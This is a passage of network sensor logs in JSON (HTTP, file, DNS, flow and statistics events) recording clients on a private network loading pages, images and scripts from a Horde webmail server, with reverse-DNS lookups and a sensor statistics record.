{"timestamp":"2020-02-29T00:01:17.658172+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal.png","state":"CLOSED","stored":false,"size":186,"tx_id":12}} {"timestamp":"2020-02-29T00:01:17.672130+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132}} {"timestamp":"2020-02-29T00:01:17.674459+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered.png","state":"CLOSED","stored":false,"size":132,"tx_id":13}} {"timestamp":"2020-02-29T00:01:17.683138+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257}} {"timestamp":"2020-02-29T00:01:17.685104+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206}} {"timestamp":"2020-02-29T00:01:17.685273+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/za.png","state":"CLOSED","stored":false,"size":257,"tx_id":14}} {"timestamp":"2020-02-29T00:01:17.686251+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:01:17.686434+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","state":"CLOSED","stored":false,"size":206,"tx_id":11}} {"timestamp":"2020-02-29T00:01:17.688181+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442}} {"timestamp":"2020-02-29T00:01:17.688705+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-active-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":15}} {"timestamp":"2020-02-29T00:01:17.689101+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","state":"CLOSED","stored":false,"size":442,"tx_id":12}} {"timestamp":"2020-02-29T00:01:17.689842+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424}} {"timestamp":"2020-02-29T00:01:17.690769+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:01:17.691700+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/trash.png","state":"CLOSED","stored":false,"size":312,"tx_id":13}} {"timestamp":"2020-02-29T00:01:17.692989+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/sent.png","state":"CLOSED","stored":false,"size":424,"tx_id":16}} {"timestamp":"2020-02-29T00:01:17.733381+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351}} {"timestamp":"2020-02-29T00:01:17.737302+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":17,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211}} {"timestamp":"2020-02-29T00:01:18.000667+0000","flow_id":1743257055554502,"event_type":"flow","src_ip":"192.168.10.81","src_port":52626,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":773,"bytes_toclient":767,"start":"2020-02-29T00:00:12.224198+0000","end":"2020-02-29T00:00:17.231773+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:18.000924+0000","flow_id":67704414066182,"event_type":"flow","src_ip":"192.168.10.81","src_port":52624,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1402,"bytes_toclient":2795,"start":"2020-02-29T00:00:12.185862+0000","end":"2020-02-29T00:00:17.230742+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:18.001076+0000","flow_id":937559845345076,"event_type":"flow","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":22,"pkts_toclient":20,"bytes_toserver":3698,"bytes_toclient":15034,"start":"2020-02-29T00:00:09.562996+0000","end":"2020-02-29T00:00:17.317658+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:19.991004+0000","flow_id":1043121556102940,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37302,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39943,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:20.096028+0000","flow_id":1043121556102940,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37302,"proto":"UDP","dns":{"type":"answer","id":39943,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:20.096028+0000","flow_id":1043121556102940,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37302,"proto":"UDP","dns":{"type":"answer","id":39943,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:20.243435+0000","flow_id":752305025627883,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44785,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20497,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:20.270208+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136}} {"timestamp":"2020-02-29T00:01:20.354683+0000","flow_id":752305025627883,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44785,"proto":"UDP","dns":{"type":"answer","id":20497,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:20.354683+0000","flow_id":752305025627883,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44785,"proto":"UDP","dns":{"type":"answer","id":20497,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:20.522450+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6966}} {"timestamp":"2020-02-29T00:01:22.216915+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52642,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927},"app_proto":"http","fileinfo":{"filename":"\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":22457,"tx_id":2}} {"timestamp":"2020-02-29T00:01:22.217017+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/base64.js","state":"CLOSED","stored":false,"size":6586,"tx_id":3}} {"timestamp":"2020-02-29T00:01:22.217071+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52644,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401},"app_proto":"http","fileinfo":{"filename":"\/js\/colorpicker.js","state":"CLOSED","stored":false,"size":12973,"tx_id":2}} {"timestamp":"2020-02-29T00:01:22.402386+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/ico_message_off.png","state":"CLOSED","stored":false,"size":468,"tx_id":4}} {"timestamp":"2020-02-29T00:01:22.696950+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/plus.png","state":"CLOSED","stored":false,"size":351,"tx_id":14}} {"timestamp":"2020-02-29T00:01:22.698813+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/folder.png","state":"CLOSED","stored":false,"size":211,"tx_id":17}} {"timestamp":"2020-02-29T00:01:23.123898+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264}} {"timestamp":"2020-02-29T00:01:23.144741+0000","flow_id":992711525217637,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57146,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50836,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:23.170777+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52650,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/az.png","state":"CLOSED","stored":false,"size":264,"tx_id":0}} {"timestamp":"2020-02-29T00:01:23.249667+0000","flow_id":992711525217637,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57146,"proto":"UDP","dns":{"type":"answer","id":50836,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:23.249667+0000","flow_id":992711525217637,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57146,"proto":"UDP","dns":{"type":"answer","id":50836,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:23.369326+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364}} {"timestamp":"2020-02-29T00:01:23.369326+0000","flow_id":136591399180898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":1}} {"timestamp":"2020-02-29T00:01:23.842322+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30698,"tx_id":0}} {"timestamp":"2020-02-29T00:01:23.849154+0000","flow_id":644114799654146,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41023,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5114,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:23.954296+0000","flow_id":644114799654146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41023,"proto":"UDP","dns":{"type":"answer","id":5114,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:23.954296+0000","flow_id":644114799654146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41023,"proto":"UDP","dns":{"type":"answer","id":5114,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:24.000144+0000","event_type":"stats","stats":{"uptime":13736,"capture":{"kernel_packets":132216,"kernel_drops":0},"decoder":{"pkts":132231,"bytes":91835352,"invalid":176,"ipv4":130810,"ipv6":8,"ethernet":132231,"raw":0,"null":0,"sll":0,"tcp":125852,"udp":4768,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2659,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2675,"synack":2666,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1707,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2173,"failed_udp":106},"tx":{"http":4431,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2249}},"flow_mgr":{"closed_pruned":2636,"new_pruned":15,"est_pruned":2222,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":162597,"memcap":0}}} {"timestamp":"2020-02-29T00:01:24.001024+0000","flow_id":1683591370237100,"event_type":"flow","src_ip":"192.168.10.81","src_port":52628,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1639,"bytes_toclient":7608,"start":"2020-02-29T00:00:17.779436+0000","end":"2020-02-29T00:00:23.125126+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:24.022214+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; 